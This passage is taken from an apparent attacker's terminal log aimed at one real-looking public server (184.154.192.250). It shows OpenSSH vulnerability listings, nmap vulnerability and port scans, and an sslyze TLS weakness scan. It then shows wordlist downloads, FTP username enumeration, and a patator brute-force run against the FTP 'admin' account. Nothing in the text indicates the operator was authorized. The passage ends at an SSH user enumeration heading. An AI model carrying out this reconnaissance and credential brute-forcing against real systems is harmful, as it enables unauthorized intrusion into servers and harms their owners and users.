  2364. | [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
  2365. | [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
  2366. | [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
  2367. | [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
  2368. | [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
  2369. | [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
  2370. |
  2371. | OSVDB - http://www.osvdb.org:
  2372. | [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
  2373. | [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
  2374. | [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
  2375. | [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
  2376. | [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
  2377. | [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
  2378. | [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
  2379. | [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
  2380. | [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
  2381. | [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
  2382. | [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
  2383. | [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
  2384. | [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
  2385. | [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
  2386. | [56921] OpenSSH Unspecified Remote Compromise
  2387. | [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
  2388. | [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
  2389. | [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
  2390. | [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
  2391. | [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
  2392. | [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
  2393. | [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
  2394. | [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
  2395. | [43745] OpenSSH X11 Forwarding Local Session Hijacking
  2396. | [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
  2397. | [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
  2398. | [37315] pam_usb OpenSSH Authentication Unspecified Issue
  2399. | [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
  2400. | [34601] OPIE w/ OpenSSH Account Enumeration
  2401. | [34600] OpenSSH S/KEY Authentication Account Enumeration
  2402. | [32721] OpenSSH Username Password Complexity Account Enumeration
  2403. | [30232] OpenSSH Privilege Separation Monitor Weakness
  2404. | [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
  2405. | [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
  2406. | [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
  2407. | [29152] OpenSSH Identical Block Packet DoS
  2408. | [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
  2409. | [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
  2410. | [22692] OpenSSH scp Command Line Filename Processing Command Injection
  2411. | [20216] OpenSSH with KerberosV Remote Authentication Bypass
  2412. | [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
  2413. | [19141] OpenSSH GSSAPIAuthentication Credential Escalation
  2414. | [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
  2415. | [16567] OpenSSH Privilege Separation LoginGraceTime DoS
  2416. | [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
  2417. | [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
  2418. | [9550] OpenSSH scp Traversal Arbitrary File Overwrite
  2419. | [6601] OpenSSH *realloc() Unspecified Memory Errors
  2420. | [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
  2421. | [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
  2422. | [6072] OpenSSH PAM Conversation Function Stack Modification
  2423. | [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
  2424. | [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
  2425. | [5408] OpenSSH echo simulation Information Disclosure
  2426. | [5113] OpenSSH NIS YP Netgroups Authentication Bypass
  2427. | [4536] OpenSSH Portable AIX linker Privilege Escalation
  2428. | [3938] OpenSSL and OpenSSH /dev/random Check Failure
  2429. | [3456] OpenSSH buffer_append_space() Heap Corruption
  2430. | [2557] OpenSSH Multiple Buffer Management Multiple Overflows
  2431. | [2140] OpenSSH w/ PAM Username Validity Timing Attack
  2432. | [2112] OpenSSH Reverse DNS Lookup Bypass
  2433. | [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
  2434. | [1853] OpenSSH Symbolic Link 'cookies' File Removal
  2435. | [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
  2436. | [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
  2437. | [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
  2438. | [688] OpenSSH UseLogin Environment Variable Local Command Execution
  2439. | [642] OpenSSH Multiple Key Type ACL Bypass
  2440. | [504] OpenSSH SSHv2 Public Key Authentication Bypass
  2441. | [341] OpenSSH UseLogin Local Privilege Escalation
  2442. |_
  2443.  
  2444. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2445. Nmap done: 1 IP address (1 host up) scanned in 9.64 seconds
  2446.  
  2447.  
  2448. root@blackbox:/usr/share/nmap/scripts# nmap --script vuln -p80 184.154.192.250
  2449. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:32 CST
  2450. Pre-scan script results:
  2451. | broadcast-avahi-dos:
  2452. | Discovered hosts:
  2453. | 224.0.0.251
  2454. | After NULL UDP avahi packet DoS (CVE-2011-1002).
  2455. |_ Hosts are all up (not vulnerable).
  2456.  
  2457.  
  2458. root@blackbox:/usr/share/nmap/scripts# nmap --script vuln -p443 184.154.192.250
  2459. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:41 CST
  2460. Pre-scan script results:
  2461. | broadcast-avahi-dos:
  2462. | Discovered hosts:
  2463. | 224.0.0.251
  2464. | After NULL UDP avahi packet DoS (CVE-2011-1002).
  2465. |_ Hosts are all up (not vulnerable).
  2466.  
  2467.  
  2468.  
  2469.  
  2470. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22 184.154.192.250 --open
  2471. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:43 CST
  2472. Nmap scan report for server.etours.cn (184.154.192.250)
  2473. Host is up (0.037s latency).
  2474.  
  2475. PORT STATE SERVICE
  2476. 22/tcp open ssh
  2477.  
  2478. Nmap done: 1 IP address (1 host up) scanned in 1.52 seconds
  2479.  
  2480.  
  2481. root@blackbox:~# git clone https://github.com/0x4D31/hassh-utils.git
  2482. root@blackbox:~# cd hassh-utils/
  2483.  
  2484. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse --script-args database=hasshd 184.154.192.250 22
  2485. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:46 CST
  2486. Nmap scan report for server.etours.cn (184.154.192.250)
  2487. Host is up (0.14s latency).
  2488. Not shown: 981 closed ports
  2489. PORT STATE SERVICE
  2490. 21/tcp open ftp
  2491. 22/tcp open ssh
  2492. 25/tcp open smtp
  2493. 53/tcp open domain
  2494. 80/tcp open http
  2495. 106/tcp open pop3pw
  2496. 110/tcp open pop3
  2497. 111/tcp open rpcbind
  2498. 143/tcp open imap
  2499. 161/tcp filtered snmp
  2500. 443/tcp open https
  2501. 465/tcp open smtps
  2502. 554/tcp open rtsp
  2503. 587/tcp open submission
  2504. 993/tcp open imaps
  2505. 995/tcp open pop3s
  2506. 3306/tcp open mysql
  2507. 7070/tcp open realserver
  2508. 8443/tcp open https-alt
  2509.  
  2510. Nmap done: 2 IP addresses (1 host up) scanned in 15.66 seconds
  2511.  
  2512.  
  2513.  
  2514. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse --script-args client_string=SSH-2.0-asdf -p 22 184.154.192.250
  2515. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:47 CST
  2516. Nmap scan report for server.etours.cn (184.154.192.250)
  2517. Host is up (0.038s latency).
  2518.  
  2519. PORT STATE SERVICE
  2520. 22/tcp open ssh
  2521.  
  2522. Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds
  2523.  
  2524.  
  2525.  
  2526. root@blackbox:/usr/share/nmap/scripts# nmap -oN scan.nmap -v -sS -sU -T5 --top-ports 1000 184.154.192.250
  2527.  
  2528. Discovered open port 111/tcp on 184.154.192.250
  2529. Discovered open port 143/tcp on 184.154.192.250
  2530. Discovered open port 53/tcp on 184.154.192.250
  2531. Discovered open port 443/tcp on 184.154.192.250
  2532. Discovered open port 554/tcp on 184.154.192.250
  2533. Discovered open port 7070/tcp on 184.154.192.250
  2534. Discovered open port 21/tcp on 184.154.192.250
  2535. Discovered open port 22/tcp on 184.154.192.250
  2536. Discovered open port 587/tcp on 184.154.192.250
  2537. Discovered open port 80/tcp on 184.154.192.250
  2538. Discovered open port 110/tcp on 184.154.192.250
  2539. Discovered open port 25/tcp on 184.154.192.250
  2540. Discovered open port 993/tcp on 184.154.192.250
  2541. Discovered open port 3306/tcp on 184.154.192.250
  2542. Discovered open port 995/tcp on 184.154.192.250
  2543. Discovered open port 8443/tcp on 184.154.192.250
  2544. Discovered open port 106/tcp on 184.154.192.250
  2545. Discovered open port 465/tcp on 184.154.192.250
  2546. Discovered open port 111/udp on 184.154.192.250
  2547.  
  2548. Not shown: 1115 closed ports, 865 open|filtered ports
  2549. PORT STATE SERVICE
  2550. 21/tcp open ftp
  2551. 22/tcp open ssh
  2552. 25/tcp open smtp
  2553. 53/tcp open domain
  2554. 80/tcp open http
  2555. 106/tcp open pop3pw
  2556. 110/tcp open pop3
  2557. 111/tcp open rpcbind
  2558. 143/tcp open imap
  2559. 161/tcp filtered snmp
  2560. 443/tcp open https
  2561. 465/tcp open smtps
  2562. 554/tcp open rtsp
  2563. 587/tcp open submission
  2564. 993/tcp open imaps
  2565. 995/tcp open pop3s
  2566. 3306/tcp open mysql
  2567. 7070/tcp open realserver
  2568. 8443/tcp open https-alt
  2569. 111/udp open rpcbind
  2570.  
  2571.  
  2572. root@blackbox:/usr/share/nmap/scripts# nmap -oN vulners.nmap -sV --version-intensity 9 --script vulners -p 80 184.154.192.250
  2573. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:50 CST
  2574. Nmap scan report for server.etours.cn (184.154.192.250)
  2575. Host is up (0.037s latency).
  2576.  
  2577. PORT STATE SERVICE VERSION
  2578. 80/tcp open http Apache httpd (PleskLin)
  2579. |_http-server-header: Apache
  2580.  
  2581. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2582. Nmap done: 1 IP address (1 host up) scanned in 11.10 seconds
  2583.  
  2584.  
  2585. root@blackbox:/usr/share/nmap/scripts# nmap -oN vulners.nmap -sV --version-intensity 9 --script vulners -p 22 184.154.192.250
  2586. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:51 CST
  2587. Nmap scan report for server.etours.cn (184.154.192.250)
  2588. Host is up (0.037s latency).
  2589.  
  2590. PORT STATE SERVICE VERSION
  2591. 22/tcp open tcpwrapped
  2592.  
  2593. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2594. Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds
  2595.  
  2596.  
  2597. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22 --open -Pn 184.154.192.250 -oX test.xml -vv
  2598.  
  2599. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22 184.154.192.250
  2600. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:52 CST
  2601. Nmap scan report for server.etours.cn (184.154.192.250)
  2602. Host is up (0.037s latency).
  2603.  
  2604. PORT STATE SERVICE
  2605. 22/tcp open ssh
  2606.  
  2607. Nmap done: 1 IP address (1 host up) scanned in 1.56 seconds
  2608.  
  2609. EXPLAIN SHELL
  2610.  
  2611. https://explainshell.com/explain?cmd=nmap+-sC+-sV+-v++-oN
  2612.  
  2613.  
  2614. SSL SCAN USING SSLYZE
  2615.  
  2616. root@blackbox:/usr/share/nmap/scripts# sslyze --regular 184.154.192.250:443
  2617.  
  2618.  
  2619.  
  2620. AVAILABLE PLUGINS
  2621. -----------------
  2622.  
  2623. HttpHeadersPlugin
  2624. SessionRenegotiationPlugin
  2625. CertificateInfoPlugin
  2626. SessionResumptionPlugin
  2627. FallbackScsvPlugin
  2628. OpenSslCcsInjectionPlugin
  2629. CompressionPlugin
  2630. RobotPlugin
  2631. HeartbleedPlugin
  2632. OpenSslCipherSuitesPlugin
  2633.  
  2634.  
  2635.  
  2636. CHECKING HOST(S) AVAILABILITY
  2637. -----------------------------
  2638.  
  2639. 184.154.192.250:443 => 184.154.192.250
  2640.  
  2641.  
  2642.  
  2643.  
  2644. SCAN RESULTS FOR 184.154.192.250:443 - 184.154.192.250
  2645. ------------------------------------------------------
  2646.  
  2647. * TLSV1_3 Cipher Suites:
  2648. Server rejected all cipher suites.
  2649.  
  2650. * Downgrade Attacks:
  2651. TLS_FALLBACK_SCSV: VULNERABLE - Signaling cipher suite not supported
  2652.  
  2653. * Session Renegotiation:
  2654. Client-initiated Renegotiation: OK - Rejected
  2655. Secure Renegotiation: VULNERABLE - Secure renegotiation not supported
  2656.  
  2657. * OpenSSL CCS Injection:
  2658. OK - Not vulnerable to OpenSSL CCS injection
  2659.  
  2660. * Deflate Compression:
  2661. VULNERABLE - Server supports Deflate compression
  2662.  
  2663. * Resumption Support:
  2664. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  2665. With TLS Tickets: OK - Supported
  2666.  
  2667. * TLSV1_1 Cipher Suites:
  2668. Server rejected all cipher suites.
  2669.  
  2670. * ROBOT Attack:
  2671. OK - Not vulnerable
  2672.  
  2673. * SSLV3 Cipher Suites:
  2674. Forward Secrecy OK - Supported
  2675. RC4 INSECURE - Supported
  2676.  
  2677. Preferred:
  2678. None - Server followed client cipher suite preference.
  2679. Accepted:
  2680. TLS_DHE_RSA_WITH_AES_256_CBC_SHA DH-1024 bits 256 bits HTTP 200 OK
  2681. TLS_RSA_WITH_AES_256_CBC_SHA - 256 bits HTTP 200 OK
  2682. TLS_DHE_RSA_WITH_AES_128_CBC_SHA DH-1024 bits 128 bits HTTP 200 OK
  2683. TLS_RSA_WITH_AES_128_CBC_SHA - 128 bits HTTP 200 OK
  2684. TLS_RSA_WITH_RC4_128_MD5 - 128 bits HTTP 200 OK
  2685. TLS_RSA_WITH_RC4_128_SHA - 128 bits HTTP 200 OK
  2686. TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA DH-1024 bits 112 bits HTTP 200 OK
  2687. TLS_RSA_WITH_3DES_EDE_CBC_SHA - 112 bits HTTP 200 OK
  2688. TLS_DHE_RSA_WITH_DES_CBC_SHA DH-1024 bits 56 bits HTTP 200 OK
  2689. TLS_RSA_WITH_DES_CBC_SHA - 56 bits HTTP 200 OK
  2690. TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA DH-512 bits 40 bits HTTP 200 OK
  2691. TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 - 40 bits HTTP 200 OK
  2692. TLS_RSA_EXPORT_WITH_DES40_CBC_SHA - 40 bits HTTP 200 OK
  2693. TLS_RSA_EXPORT_WITH_RC4_40_MD5 - 40 bits HTTP 200 OK
  2694.  
  2695. * SSLV2 Cipher Suites:
  2696. Forward Secrecy INSECURE - Not Supported
  2697. RC4 INSECURE - Supported
  2698.  
  2699. Preferred:
  2700. None - Server followed client cipher suite preference.
  2701. Accepted:
  2702. SSL_CK_RC2_128_CBC_WITH_MD5 - 128 bits HTTP 200 OK
  2703. SSL_CK_RC4_128_WITH_MD5 - 128 bits HTTP 200 OK
  2704. SSL_CK_DES_192_EDE3_CBC_WITH_MD5 - 112 bits HTTP 200 OK
  2705. SSL_CK_DES_64_CBC_WITH_MD5 - 56 bits HTTP 200 OK
  2706. SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5 - 40 bits HTTP 200 OK
  2707. SSL_CK_RC4_128_EXPORT40_WITH_MD5 - 40 bits HTTP 200 OK
  2708.  
  2709. * Certificate Information:
  2710. Content
  2711. SHA1 Fingerprint: 3f12da575e9a2e4cdc624a2c64f2b3d9e8fea274
  2712. Common Name: Parallels Panel
  2713. Issuer: Parallels Panel
  2714. Serial Number: 1315993919
  2715. Not Before: 2011-09-14 09:51:59
  2716. Not After: 2012-09-13 09:51:59
  2717. Signature Algorithm: sha1
  2718. Public Key Algorithm: RSA
  2719. Key Size: 2048
  2720. Exponent: 65537 (0x10001)
  2721. DNS Subject Alternative Names: []
  2722.  
  2723. Trust
  2724. Hostname Validation: FAILED - Certificate does NOT match 184.154.192.250
  2725. Android CA Store (8.1.0_r9): FAILED - Certificate is NOT Trusted: self signed certificate
  2726. iOS CA Store (11): FAILED - Certificate is NOT Trusted: self signed certificate
  2727. Java CA Store (jre-10.0.2): FAILED - Certificate is NOT Trusted: self signed certificate
  2728. macOS CA Store (High Sierra): FAILED - Certificate is NOT Trusted: self signed certificate
  2729. Mozilla CA Store (2018-04-12): FAILED - Certificate is NOT Trusted: self signed certificate
  2730. Windows CA Store (2018-06-30): FAILED - Certificate is NOT Trusted: self signed certificate
  2731. Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
  2732. Received Chain: Parallels Panel
  2733. Verified Chain: ERROR - Could not build verified chain (certificate untrusted?)
  2734. Received Chain Contains Anchor: ERROR - Could not build verified chain (certificate untrusted?)
  2735. Received Chain Order: OK - Order is valid
  2736. Verified Chain contains SHA1: ERROR - Could not build verified chain (certificate untrusted?)
  2737.  
  2738. Extensions
  2739. OCSP Must-Staple: NOT SUPPORTED - Extension not found
  2740. Certificate Transparency: NOT SUPPORTED - Extension not found
  2741.  
  2742. OCSP Stapling
  2743. NOT SUPPORTED - Server did not send back an OCSP response
  2744.  
  2745. * OpenSSL Heartbleed:
  2746. OK - Not vulnerable to Heartbleed
  2747.  
  2748. * TLSV1_2 Cipher Suites:
  2749. Server rejected all cipher suites.
  2750.  
  2751. * TLSV1 Cipher Suites:
  2752. Forward Secrecy OK - Supported
  2753. RC4 INSECURE - Supported
  2754.  
  2755. Preferred:
  2756. None - Server followed client cipher suite preference.
  2757. Accepted:
  2758. TLS_DHE_RSA_WITH_AES_256_CBC_SHA DH-1024 bits 256 bits HTTP 200 OK
  2759. TLS_RSA_WITH_AES_256_CBC_SHA - 256 bits HTTP 200 OK
  2760. TLS_DHE_RSA_WITH_AES_128_CBC_SHA DH-1024 bits 128 bits HTTP 200 OK
  2761. TLS_RSA_WITH_AES_128_CBC_SHA - 128 bits HTTP 200 OK
  2762. TLS_RSA_WITH_RC4_128_SHA - 128 bits HTTP 200 OK
  2763. TLS_RSA_WITH_RC4_128_MD5 - 128 bits HTTP 200 OK
  2764. TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA DH-1024 bits 112 bits HTTP 200 OK
  2765. TLS_RSA_WITH_3DES_EDE_CBC_SHA - 112 bits HTTP 200 OK
  2766. TLS_DHE_RSA_WITH_DES_CBC_SHA DH-1024 bits 56 bits HTTP 200 OK
  2767. TLS_RSA_WITH_DES_CBC_SHA - 56 bits HTTP 200 OK
  2768. TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA DH-512 bits 40 bits HTTP 200 OK
  2769. TLS_RSA_EXPORT_WITH_DES40_CBC_SHA - 40 bits HTTP 200 OK
  2770. TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 - 40 bits HTTP 200 OK
  2771. TLS_RSA_EXPORT_WITH_RC4_40_MD5 - 40 bits HTTP 200 OK
  2772.  
  2773.  
  2774. SCAN COMPLETED IN 18.49 S
  2775. -------------------------
  2776.  
  2777.  
  2778.  
  2779. CHECK ANONYMOUS FTP LOGIN FTP Client for File Traversal
  2780.  
  2781. root@blackbox:/usr/share/nmap/scripts# ftp 184.154.192.250
  2782. Connected to 184.154.192.250.
  2783. 220 ProFTPD 1.3.3e Server (ProFTPD) [184.154.192.250]
  2784. Name (184.154.192.250:root):
  2785. 331 Password required for root
  2786. Password:
  2787. 530 Login incorrect.
  2788. Login failed.
  2789. Remote system type is UNIX.
  2790. Using binary mode to transfer files.
  2791. ftp> quit
  2792. 221 Goodbye.
  2793.  
  2794.  
  2795. download password list from here:
  2796.  
  2797. https://github.com/berzerk0/Probable-Wordlists
  2798.  
  2799. root@blackbox:~# git clone https://github.com/jeanphorn/wordlist.git
  2800. root@blackbox:~# cd wordlist/
  2801. root@blackbox:~/wordlist# ls
  2802. adobe_top100_password.txt passlist.txt router_default_password.md
  2803. hydra.restore rdp_passlist.txt ssh_passwd.txt
  2804. pass_list.rar README.md usernames.txt
  2805.  
  2806. or search locally
  2807.  
  2808. user list
  2809. /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2810.  
  2811. root@blackbox:/opt/patator# locate john.txt
  2812. /opt/commix/src/txt/passwords_john.txt
  2813. /opt/hacktronian/commix/src/txt/passwords_john.txt
  2814. /usr/share/commix/src/txt/passwords_john.txt
  2815.  
  2816.  
  2817. ftp-user-enum
  2818.  
  2819. root@blackbox:/opt# wget http://pentestmonkey.net/tools/ftp-user-enum/ftp-user-enum-1.0.tar.gz
  2820. root@blackbox:/opt# tar -xzf ftp-user-enum-1.0.tar.gz
  2821. root@blackbox:/opt# cd ftp-user-enum-1.0/
  2822. root@blackbox:/opt/ftp-user-enum-1.0# cp ftp-user-enum.pl /usr/local/bin/
  2823. root@blackbox:/opt/ftp-user-enum-1.0# perl -MCPAN -e shell
  2824. cpan[1]> install Getopt::Std
  2825. cpan[2]> exit
  2826. Lockfile removed.
  2827.  
  2828.  
  2829. root@blackbox:/opt/ftp-user-enum-1.0# ls
  2830. CHANGELOG COPYING COPYING.GPL ftp-user-enum.pl ftp-user-enum-user-docs.pdf
  2831. root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -M sol -U /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt -t 184.154.192.250
  2832. Starting ftp-user-enum v1.0 ( http://pentestmonkey.net/tools/ftp-user-enum )
  2833.  
  2834. ----------------------------------------------------------
  2835. | Scan Information |
  2836. ----------------------------------------------------------
  2837.  
  2838. Mode ..................... sol
  2839. Worker Processes ......... 5
  2840. Usernames file ........... /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2841. Target count ............. 1
  2842. Username count ........... 34
  2843. Target TCP port .......... 21
  2844. Query timeout ............ 15 secs
  2845.  
  2846. ######## Scan started at Wed Jan 22 14:56:54 2020 #########
  2847. @184.154.192.250: bee
  2848. @184.154.192.250: administrator
  2849. @184.154.192.250: anonymous
  2850. @184.154.192.250: admin
  2851. @184.154.192.250: guest
  2852. @184.154.192.250: ftp
  2853. @184.154.192.250: GUEST
  2854. @184.154.192.250: info
  2855. @184.154.192.250: mail
  2856. @184.154.192.250: mysql
  2857. @184.154.192.250: msfadmin
  2858. @184.154.192.250: nobody
  2859. @184.154.192.250: mailadmin
  2860. @184.154.192.250: owaspbwa
  2861. @184.154.192.250: private
  2862. @184.154.192.250: postfix
  2863. @184.154.192.250: proftpd
  2864. @184.154.192.250: postgres
  2865. @184.154.192.250: root
  2866. @184.154.192.250: public
  2867. @184.154.192.250: support
  2868. @184.154.192.250: sys
  2869. @184.154.192.250: superadmin
  2870. @184.154.192.250: systemadmin
  2871. @184.154.192.250: system
  2872. @184.154.192.250: systemadministrator
  2873. @184.154.192.250: test
  2874. @184.154.192.250: tomcat
  2875. @184.154.192.250: webmaster
  2876. @184.154.192.250: user
  2877. [email protected]: Fortimanager_Access
  2878. ######## Scan completed at Wed Jan 22 14:58:39 2020 #########
  2879. 34 results.
  2880.  
  2881. 34 queries in 105 seconds (0.3 queries / sec)
  2882.  
  2883. root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -M iu -U /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt -t 184.154.192.250
  2884. Starting ftp-user-enum v1.0 ( http://pentestmonkey.net/tools/ftp-user-enum )
  2885.  
  2886. ----------------------------------------------------------
  2887. | Scan Information |
  2888. ----------------------------------------------------------
  2889.  
  2890. Mode ..................... iu
  2891. Worker Processes ......... 5
  2892. Usernames file ........... /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2893. Target count ............. 1
  2894. Username count ........... 34
  2895. Target TCP port .......... 21
  2896. Query timeout ............ 15 secs
  2897.  
  2898. ######## Scan started at Wed Jan 22 14:59:28 2020 #########
  2899. @184.154.192.250: administrator
  2900. @184.154.192.250: anonymous
  2901. @184.154.192.250: admin
  2902. @184.154.192.250: bee
  2903. @184.154.192.250: ftp
  2904. @184.154.192.250: GUEST
  2905. @184.154.192.250: guest
  2906. @184.154.192.250: info
  2907. @184.154.192.250: mail
  2908. @184.154.192.250: mailadmin
  2909. @184.154.192.250: msfadmin
  2910. @184.154.192.250: mysql
  2911. @184.154.192.250: nobody
  2912. @184.154.192.250: owaspbwa
  2913. @184.154.192.250: postfix
  2914. @184.154.192.250: postgres
  2915. @184.154.192.250: private
  2916. @184.154.192.250: proftpd
  2917. @184.154.192.250: public
  2918. @184.154.192.250: root
  2919. @184.154.192.250: superadmin
  2920. @184.154.192.250: support
  2921. @184.154.192.250: sys
  2922. @184.154.192.250: system
  2923. @184.154.192.250: systemadmin
  2924. @184.154.192.250: test
  2925. @184.154.192.250: systemadministrator
  2926. @184.154.192.250: tomcat
  2927. @184.154.192.250: user
  2928. @184.154.192.250: webmaster
  2929. [email protected]: Fortimanager_Access
  2930. ######## Scan completed at Wed Jan 22 14:59:33 2020 #########
  2931. 34 results.
  2932.  
  2933. 34 queries in 5 seconds (6.8 queries / sec)
  2934.  
  2935.  
  2936. root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -U /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt -t 184.154.192.250
  2937. Starting ftp-user-enum v1.0 ( http://pentestmonkey.net/tools/ftp-user-enum )
  2938.  
  2939. ----------------------------------------------------------
  2940. | Scan Information |
  2941. ----------------------------------------------------------
  2942.  
  2943. Mode ..................... sol
  2944. Worker Processes ......... 5
  2945. Usernames file ........... /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2946. Target count ............. 1
  2947. Username count ........... 34
  2948. Target TCP port .......... 21
  2949. Query timeout ............ 15 secs
  2950.  
  2951. ######## Scan started at Wed Jan 22 15:00:21 2020 #########
  2952. @184.154.192.250: administrator
  2953. @184.154.192.250: anonymous
  2954. @184.154.192.250: admin
  2955. @184.154.192.250: bee
  2956. @184.154.192.250: ftp
  2957. @184.154.192.250: guest
  2958. @184.154.192.250: GUEST
  2959. @184.154.192.250: info
  2960. @184.154.192.250: mail
  2961. @184.154.192.250: mailadmin
  2962. @184.154.192.250: msfadmin
  2963. @184.154.192.250: mysql
  2964. @184.154.192.250: nobody
  2965. @184.154.192.250: owaspbwa
  2966. @184.154.192.250: postfix
  2967. @184.154.192.250: postgres
  2968. @184.154.192.250: private
  2969. @184.154.192.250: proftpd
  2970. @184.154.192.250: public
  2971. @184.154.192.250: root
  2972. @184.154.192.250: superadmin
  2973. @184.154.192.250: support
  2974. @184.154.192.250: sys
  2975. @184.154.192.250: systemadmin
  2976. @184.154.192.250: systemadministrator
  2977. @184.154.192.250: test
  2978. @184.154.192.250: tomcat
  2979. @184.154.192.250: system
  2980. @184.154.192.250: user
  2981. @184.154.192.250: webmaster
  2982. [email protected]: Fortimanager_Access
  2983. ######## Scan completed at Wed Jan 22 15:02:06 2020 #########
  2984. 34 results.
  2985.  
  2986. 34 queries in 105 seconds (0.3 queries / sec)
  2987.  
  2988.  
  2989. root@blackbox:/opt# git clone https://github.com/lanjelot/patator
  2990. root@blackbox:/opt/patator# python patator.py ftp_login --help
  2991.  
  2992.  
  2993. root@blackbox:/opt/patator# patator ftp_login host=184.154.192.250 user=admin password=FILE0 0=/opt/commix/src/txt/passwords_john.txt -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
  2994.  
  2995. 15:03:18 patator INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2020-01-22 15:03 CST
  2996. 15:03:18 patator INFO - Progress: 0.0% (0/1) | Speed: 10 r/s | ETC: 15:03:18 (00:00:00 remaining)
  2997. 15:03:18 patator INFO -
  2998. 15:03:18 patator INFO - code size time | candidate | num | mesg
  2999. 15:03:18 patator INFO - -----------------------------------------------------------------------------
  3000. 15:06:01 patator INFO - Hits/Done/Skip/Fail/Size: 0/3108/0/0/3108, Avg: 19 r/s, Time: 0h 2m 43s
  3001.  
  3002.  
  3003. SSH USERS ENUMERATION
  3004.  
